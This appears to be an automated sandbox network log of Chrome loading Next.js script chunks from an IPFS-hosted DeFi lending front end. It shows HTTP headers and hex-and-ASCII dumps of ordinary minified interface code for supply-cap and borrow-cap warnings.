                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 5f 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 74 2e 5a 29 28 65 2c 6e 2c 72 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 5f 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72
                                                                                                                                                                                                                                                  Data Ascii: h;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?_(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):_(Object(r)).forEach((function(n){Object.definePr


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  62192.168.2.549779209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/3629-beffcb1d37e29d12.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9876
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreib3s4g6eiukrx5npcamziub5eo3rw3jryidxcjfmoerkkd255qdf4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3629-beffcb1d37e29d12.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreib3s4g6eiukrx5npcamziub5eo3rw3jryidxcjfmoerkkd255qdf4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 37 61 63 33 62 34 33 66 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e427ac3b43fb-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 32 39 5d 2c 7b 34 33 36 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 68 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 2c 72 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4a 7d 2c 77 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 7d 2c 6f 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 48 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 6f 3d 74 28 34 37 33 30 29 2c 69 3d 74 28 31 32 37 39 29 2c 63 3d 74 28 36 37 32 39 34 29 2c 73 3d 74 28 34
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3629],{43629:function(e,r,t){t.d(r,{hv:function(){return W},rM:function(){return J},wD:function(){return K},ov:function(){return H}});var n=t(59499),o=t(4730),i=t(1279),c=t(67294),s=t(4
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 77 68 61 74 73 2d 6e 65 77 2f 73 75 70 70 6c 79 2d 62 6f 72 72 6f 77 2d 63 61 70 73 22 2c 75 6e 64 65 72 6c 69 6e 65 3a 22 61 6c 77 61 79 73 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 62 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 4c 65 61 72 6e 20 6d 6f 72 65 22 7d 29 7d 29 5d 7d 29 7d 29 29 7d 29 3a 6e 75 6c 6c 7d 2c 4f 3d 5b 22 64 65 62 74 43 65 69 6c 69 6e 67 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 72 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74
                                                                                                                                                                                                                                                  Data Ascii: whats-new/supply-borrow-caps",underline:"always",children:(0,b.jsx)(s.cC,{id:"Learn more"})})]})}))}):null},O=["debtCeiling"];function v(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((funct
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 43 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75
                                                                                                                                                                                                                                                  Data Ascii: PropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function x(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?C(Object(t),!0).forEach((fu
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 55 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 45 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61
                                                                                                                                                                                                                                                  Data Ascii: tion(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):U(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var E=function(e){va
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 46 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 64 65 62 74 43 65 69 6c 69 6e 67 2c 74 3d 65 2e 69 63 6f 6e 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2c 69 3d 28 30 2c 6f 2e 5a 29 28 65 2c 4d 29 3b 69 66 28 21 72 2e 70 65 72 63 65 6e 74 55 73 65 64 7c 7c 72 2e 70 65 72 63 65 6e 74 55 73 65 64 3c 39 38 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 63 3d 72 2e 69 73 4d 61 78 65 64 3f 22 65 72 72 6f 72 22 3a 22 77 61 72 6e 69 6e 67 22 3b 72 65 74 75 72 6e 28 30 2c 62 2e 6a 73 78 73 29 28 6d 2e 76 2c 6b 28 6b 28 7b 73 65 76 65 72 69 74 79 3a 63 2c 69 63 6f 6e 3a 6e 7d
                                                                                                                                                                                                                                                  Data Ascii: ,Object.getOwnPropertyDescriptor(t,r))}))}return e}var F=function(e){var r=e.debtCeiling,t=e.icon,n=void 0===t||t,i=(0,o.Z)(e,M);if(!r.percentUsed||r.percentUsed<98)return null;var c=r.isMaxed?"error":"warning";return(0,b.jsxs)(m.v,k(k({severity:c,icon:n}
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 73 75 70 70 6c 79 43 61 70 2c 74 3d 65 2e 69 63 6f 6e 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2c 69 3d 28 30 2c 6f 2e 5a 29 28 65 2c 4c 29 3b 69 66 28 21 72 2e 70 65 72 63 65 6e 74 55 73 65 64 7c 7c 72 2e 70 65 72 63 65 6e 74 55 73 65 64 3c 39 38 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 28 30 2c 62 2e 6a 73 78 73 29 28 6d 2e 76 2c 4e 28 4e 28 7b 73 65 76 65 72 69 74 79 3a 22 77 61 72 6e 69 6e 67 22 2c 69 63 6f 6e 3a 6e 7d 2c 69 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 72 2e 69 73 4d 61 78 65 64 3f 28 30 2c 62 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 50 72 6f 74 6f 63 6f 6c 20 73 75 70 70 6c 79 20 63 61 70 20 69 73 20 61 74 20 31 30 30 25 20 66 6f 72 20 74 68 69 73 20 61 73
                                                                                                                                                                                                                                                  Data Ascii: ion(e){var r=e.supplyCap,t=e.icon,n=void 0===t||t,i=(0,o.Z)(e,L);if(!r.percentUsed||r.percentUsed<98)return null;return(0,b.jsxs)(m.v,N(N({severity:"warning",icon:n},i),{},{children:[r.isMaxed?(0,b.jsx)(s.cC,{id:"Protocol supply cap is at 100% for this as
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 20 6e 6f 74 20 67 69 76 65 6e 20 61 20 76 61 6c 69 64 20 72 65 73 65 72 76 65 20 61 73 73 65 74 20 74 6f 20 70 61 72 73 65 22 29 2c 6e 75 6c 6c 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 49 28 65 29 2c 74 3d 72 2e 73 75 70 70 6c 79 43 61 70 55 73 61 67 65 2c 6e 3d 72 2e 73 75 70 70 6c 79 43 61 70 52 65 61 63 68 65 64 2c 69 3d 4a 28 65 29 2c 63 3d 69 2e 62 6f 72 72 6f 77 43 61 70 55 73 61 67 65 2c 73 3d 69 2e 62 6f 72 72 6f 77 43 61 70 52 65 61 63 68 65 64 2c 61 3d 4b 28 65 29 3b 72 65 74 75 72 6e 7b 72 65 73 65 72 76 65 3a 65 2c 73 75 70 70 6c 79 43 61 70 3a 7b 70 65 72 63 65 6e 74 55 73 65 64 3a 74 2c 69 73 4d 61 78 65 64 3a 6e 2c 64 65 74 65 72 6d 69 6e 65 57 61 72 6e 69 6e 67 44 69 73 70 6c 61 79 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: not given a valid reserve asset to parse"),null;var n=function(e){var r=I(e),t=r.supplyCapUsage,n=r.supplyCapReached,i=J(e),c=i.borrowCapUsage,s=i.borrowCapReached,a=K(e);return{reserve:e,supplyCap:{percentUsed:t,isMaxed:n,determineWarningDisplay:functio
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC357INData Raw: 3d 3d 31 2f 30 3f 30 3a 72 2c 73 75 70 70 6c 79 43 61 70 52 65 61 63 68 65 64 3a 72 3e 3d 39 39 2e 39 39 7d 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 3f 31 30 30 2a 28 30 2c 69 2e 68 45 29 28 65 2e 74 6f 74 61 6c 44 65 62 74 29 2e 64 69 76 69 64 65 64 42 79 28 65 2e 62 6f 72 72 6f 77 43 61 70 29 2e 74 6f 4e 75 6d 62 65 72 28 29 3a 30 3b 72 65 74 75 72 6e 7b 62 6f 72 72 6f 77 43 61 70 55 73 61 67 65 3a 72 3d 72 3d 3d 3d 31 2f 30 3f 30 3a 72 2c 62 6f 72 72 6f 77 43 61 70 52 65 61 63 68 65 64 3a 72 3e 3d 39 39 2e 39 39 7d 7d 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 3f 31 30 30 2a 28 30 2c 69 2e 68 45 29 28 65 2e 69 73 6f 6c 61 74 69 6f 6e 4d 6f 64 65 54 6f 74 61 6c 44 65 62 74 29 2e 64 69 76 69 64 65 64 42
                                                                                                                                                                                                                                                  Data Ascii: ==1/0?0:r,supplyCapReached:r>=99.99}},J=function(e){var r=e?100*(0,i.hE)(e.totalDebt).dividedBy(e.borrowCap).toNumber():0;return{borrowCapUsage:r=r===1/0?0:r,borrowCapReached:r>=99.99}},K=function(e){var r=e?100*(0,i.hE)(e.isolationModeTotalDebt).dividedB


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  63192.168.2.549780209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC504OUTGET /_next/static/chunks/7828.bc42be26a9e94bb7.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 25421
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibidvl36h62dev3l2dkc5j6jzlxbnojzph6lths2jcxp2fpi6o7kq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7828.bc42be26a9e94bb7.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreibidvl36h62dev3l2dkc5j6jzlxbnojzph6lths2jcxp2fpi6o7kq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 675765
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 61 39 38 36 31 33 33 34 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42a98613344-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 38 32 38 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 76 61 72 20 74 3d 6e 28 36 34 38 33 36 29 3b 72 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 74 28 6e 28 36 34 39 33 38 29 29 2c 69 3d 6e 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7828],{62753:function(e,r,n){var t=n(64836);r.Z=void 0;var o=t(n(64938)),i=n(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 72 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29
                                                                                                                                                                                                                                                  Data Ascii: exShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[r.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e)
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 72 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 66 3d 28 30 2c 64 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 72 29 3d 3e 5b 72 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 72 7d 29 3d 3e 7b 6c 65 74 20 6e 3d 28 30 2c 6f 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 73 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 72
                                                                                                                                                                                                                                                  Data Ascii: .length-1&&e.push(i.cloneElement(r,{key:`separator-${o}`})),e)),[])}const f=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,r)=>[r.root]})((({ownerState:e,theme:r})=>{let n=(0,o.Z)({display:"flex",flexDirection:"column"},(0,s.k9)({theme:r
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 37 33 30 29 2c 69 3d 6e 28 34 39 35 30 31 29 2c 73 3d 6e 28 31 32 37 39 29 2c 61 3d 6e 28 36 32 30 39 37 29 2c 63 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 64 3d 6e 28 37 35 30 38 34 29 2c 75 3d 6e 28 37 30 37 39 34 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 6d 3d 6e 28 38 35 38 39 33 29 2c 78 3d 5b 22 76 61 6c 75 65 22 2c 22 6f 6e 49 6e 66 6f 43 6c 69 63 6b 22 2c 22 48 41 4c 49 6e 74 65 67 72 61 74 69 6f 6e 43 6f 6d 70 6f 6e 65 6e 74 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f
                                                                                                                                                                                                                                                  Data Ascii: (59499),o=n(4730),i=n(49501),s=n(1279),a=n(62097),c=n(30120),l=n(29630),d=n(75084),u=n(70794),p=n(41024),m=n(85893),x=["value","onInfoClick","HALIntegrationComponent"];function f(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getO
